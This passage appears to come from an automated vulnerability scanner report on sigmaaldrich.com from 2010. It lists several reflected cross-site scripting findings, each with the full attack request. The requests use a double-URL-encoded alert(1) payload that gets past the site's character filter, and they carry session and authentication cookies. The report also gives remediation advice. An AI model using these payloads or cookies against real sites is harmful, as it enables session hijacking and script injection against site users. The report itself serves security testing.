ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:36 GMT
Content-Length: 28983
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-servicec39a6";alert(1)//e5b0302a57f/services/mfg-production","E404") ;
   </script>
...[SNIP]...

1.189. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/mfg-production [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/mfg-production

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3bcca%2522%253balert%25281%2529%252f%252facece9d493 was submitted in the REST URL parameter 5. This input was echoed as 3bcca";alert(1)//acece9d493 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/services3bcca%2522%253balert%25281%2529%252f%252facece9d493/mfg-production HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:38 GMT
Content-Length: 28982
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/services3bcca";alert(1)//acece9d493/mfg-production","E404") ;
   </script>
...[SNIP]...

1.190. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/mfg-production [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/mfg-production

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c96d4%2522%253balert%25281%2529%252f%252f0cc55d18c07 was submitted in the REST URL parameter 6. This input was echoed as c96d4";alert(1)//0cc55d18c07 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/services/mfg-productionc96d4%2522%253balert%25281%2529%252f%252f0cc55d18c07 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:39 GMT
Content-Length: 28983
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/services/mfg-productionc96d4";alert(1)//0cc55d18c07","E404") ;
   </script>
...[SNIP]...

1.191. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/mfg-production/oem-services [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/mfg-production/oem-services

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb1c4%2522%253balert%25281%2529%252f%252f9d6f2c4ebeb was submitted in the REST URL parameter 1. This input was echoed as eb1c4";alert(1)//9d6f2c4ebeb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contenteb1c4%2522%253balert%25281%2529%252f%252f9d6f2c4ebeb/sigma-aldrich/customer-support/customer-service/services/mfg-production/oem-services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:34 GMT
Content-Length: 28996
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contenteb1c4";alert(1)//9d6f2c4ebeb/sigma-aldrich/customer-support/customer-service/services/mfg-production/oem-services","E404") ;
   </script>
...[SNIP]...

1.192. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/mfg-production/oem-services [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/mfg-production/oem-services

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 233fa%2522%253balert%25281%2529%252f%252fbd0058c4543 was submitted in the REST URL parameter 2. This input was echoed as 233fa";alert(1)//bd0058c4543 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich233fa%2522%253balert%25281%2529%252f%252fbd0058c4543/customer-support/customer-service/services/mfg-production/oem-services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:36 GMT
Content-Length: 28996
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich233fa";alert(1)//bd0058c4543/customer-support/customer-service/services/mfg-production/oem-services","E404") ;
   </script>
...[SNIP]...

1.193. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/mfg-production/oem-services [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/mfg-production/oem-services

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f339%2522%253balert%25281%2529%252f%252f6ecc21c7619 was submitted in the REST URL parameter 3. This input was echoed as 1f339";alert(1)//6ecc21c7619 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support1f339%2522%253balert%25281%2529%252f%252f6ecc21c7619/customer-service/services/mfg-production/oem-services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
